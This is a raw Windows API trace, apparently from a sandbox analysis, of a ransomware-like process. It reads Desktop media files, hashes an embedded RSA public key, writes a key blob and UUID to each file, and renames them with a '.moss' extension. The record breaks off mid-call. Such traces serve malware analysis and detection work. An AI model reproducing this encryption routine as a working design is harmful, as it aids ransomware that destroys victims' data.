[0169.059] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9WEgK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9wegk.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.059] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=73273) returned 1 [0169.059] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.063] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x11e13, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.064] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.065] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.065] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x11e39, lpOverlapped=0x0) returned 1 [0169.066] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.066] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.066] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.066] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.066] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.068] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.068] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.068] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.068] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.068] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.068] GetLastError () returned 0x0 [0169.068] SetLastError (dwErrCode=0x0) [0169.068] GetLastError () returned 0x0 [0169.068] SetLastError (dwErrCode=0x0) [0169.068] GetLastError () returned 0x0 [0169.068] SetLastError (dwErrCode=0x0) [0169.069] GetLastError () returned 0x0 [0169.069] SetLastError (dwErrCode=0x0) [0169.069] GetLastError () returned 0x0 [0169.069] SetLastError (dwErrCode=0x0) [0169.069] GetLastError () returned 0x0 [0169.069] SetLastError (dwErrCode=0x0) [0169.069] GetLastError () returned 0x0 [0169.069] SetLastError (dwErrCode=0x0) [0169.069] GetLastError () returned 0x0 [0169.069] SetLastError (dwErrCode=0x0) [0169.069] GetLastError () returned 0x0 [0169.069] SetLastError (dwErrCode=0x0) [0169.069] GetLastError () returned 0x0 [0169.069] SetLastError (dwErrCode=0x0) [0169.069] GetLastError () returned 0x0 [0169.070] SetLastError (dwErrCode=0x0) [0169.070] GetLastError () returned 0x0 [0169.070] SetLastError (dwErrCode=0x0) [0169.070] GetLastError () returned 0x0 [0169.070] SetLastError (dwErrCode=0x0) [0169.070] GetLastError () returned 0x0 [0169.070] SetLastError (dwErrCode=0x0) [0169.070] GetLastError () returned 0x0 [0169.070] SetLastError (dwErrCode=0x0) [0169.070] GetLastError () returned 0x0 [0169.070] SetLastError (dwErrCode=0x0) [0169.070] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.070] GetLastError () returned 0x0 [0169.070] SetLastError (dwErrCode=0x0) [0169.070] GetLastError () returned 0x0 [0169.071] SetLastError (dwErrCode=0x0) [0169.071] GetLastError () returned 0x0 [0169.071] SetLastError (dwErrCode=0x0) [0169.071] GetLastError () returned 0x0 [0169.071] SetLastError (dwErrCode=0x0) [0169.071] GetLastError () returned 0x0 [0169.071] SetLastError (dwErrCode=0x0) [0169.071] GetLastError () returned 0x0 [0169.071] SetLastError (dwErrCode=0x0) [0169.071] GetLastError () returned 0x0 [0169.071] SetLastError (dwErrCode=0x0) [0169.071] GetLastError () returned 0x0 [0169.071] SetLastError (dwErrCode=0x0) [0169.071] GetLastError () returned 0x0 [0169.071] SetLastError (dwErrCode=0x0) [0169.072] GetLastError () returned 0x0 [0169.072] SetLastError (dwErrCode=0x0) [0169.072] GetLastError () returned 0x0 [0169.072] SetLastError (dwErrCode=0x0) [0169.072] GetLastError () returned 0x0 [0169.072] SetLastError (dwErrCode=0x0) [0169.072] GetLastError () returned 0x0 [0169.072] SetLastError (dwErrCode=0x0) [0169.072] GetLastError () returned 0x0 [0169.072] SetLastError (dwErrCode=0x0) [0169.072] GetLastError () returned 0x0 [0169.072] SetLastError (dwErrCode=0x0) [0169.072] GetLastError () returned 0x0 [0169.072] SetLastError (dwErrCode=0x0) [0169.072] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.072] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0169.073] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.073] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.073] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.073] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.073] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.073] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11e40) returned 0x3b48820 [0169.073] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.073] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45080 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc48 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b450c8 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc60 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbcd8 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbcf0 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0xd23a00 [0169.074] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xd23a00, Size=0x218) returned 0x3b449a8 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b5a668 [0169.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbcd8 | out: hHeap=0xcd0000) returned 1 [0169.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbcf0 | out: hHeap=0xcd0000) returned 1 [0169.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.074] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5a668 | out: hHeap=0xcd0000) returned 1 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2a0 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbcf0 [0169.074] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbcd8 [0169.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0169.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0169.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbcf0 | out: hHeap=0xcd0000) returned 1 [0169.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbcd8 | out: hHeap=0xcd0000) returned 1 [0169.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.075] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449a8 | out: hHeap=0xcd0000) returned 1 [0169.075] GetCurrentThreadId () returned 0x324 [0169.075] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd318b0 [0169.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0169.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0169.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.076] GetCurrentThreadId () returned 0x324 [0169.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.076] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.076] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0169.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.077] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.077] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.078] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x11e39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.078] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.078] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.078] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.078] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.078] CloseHandle (hObject=0x664) returned 1 [0169.080] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9WEgK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9wegk.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9WEgK.mp3.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9wegk.mp3.moss")) returned 1 [0169.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.081] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.082] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.083] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0169.083] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8adcb9e0, ftCreationTime.dwHighDateTime=0x1d5e81b, ftLastAccessTime.dwLowDateTime=0xe06081b0, ftLastAccessTime.dwHighDateTime=0x1d5dcb5, ftLastWriteTime.dwLowDateTime=0xe06081b0, ftLastWriteTime.dwHighDateTime=0x1d5dcb5, nFileSizeHigh=0x0, nFileSizeLow=0x14dbe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BsP7T_k67YTo.flv", cAlternateFileName="BSP7T_~1.FLV")) returned 1 [0169.083] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BsP7T_k67YTo.flv") returned=".flv" [0169.083] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BsP7T_k67YTo.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bsp7t_k67yto.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.083] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=85438) returned 1 [0169.083] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.086] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x14d98, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.086] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.087] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x14dbe, lpOverlapped=0x0) returned 1 [0169.088] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.088] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.088] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.088] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.089] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.089] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.089] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.089] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.089] GetLastError () returned 0x0 [0169.089] SetLastError (dwErrCode=0x0) [0169.089] GetLastError () returned 0x0 [0169.089] SetLastError (dwErrCode=0x0) [0169.089] GetLastError () returned 0x0 [0169.089] SetLastError (dwErrCode=0x0) [0169.089] GetLastError () returned 0x0 [0169.089] SetLastError (dwErrCode=0x0) [0169.089] GetLastError () returned 0x0 [0169.090] SetLastError (dwErrCode=0x0) [0169.090] GetLastError () returned 0x0 [0169.090] SetLastError (dwErrCode=0x0) [0169.090] GetLastError () returned 0x0 [0169.090] SetLastError (dwErrCode=0x0) [0169.090] GetLastError () returned 0x0 [0169.090] SetLastError (dwErrCode=0x0) [0169.090] GetLastError () returned 0x0 [0169.090] SetLastError (dwErrCode=0x0) [0169.090] GetLastError () returned 0x0 [0169.090] SetLastError (dwErrCode=0x0) [0169.090] GetLastError () returned 0x0 [0169.090] SetLastError (dwErrCode=0x0) [0169.090] GetLastError () returned 0x0 [0169.090] SetLastError (dwErrCode=0x0) [0169.090] GetLastError () returned 0x0 [0169.090] SetLastError (dwErrCode=0x0) [0169.090] GetLastError () returned 0x0 [0169.090] SetLastError (dwErrCode=0x0) [0169.090] GetLastError () returned 0x0 [0169.090] SetLastError (dwErrCode=0x0) [0169.090] GetLastError () returned 0x0 [0169.090] SetLastError (dwErrCode=0x0) [0169.090] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.090] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.091] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.091] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.091] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.091] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.091] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.091] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14dc0) returned 0x3b48820 [0169.091] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, 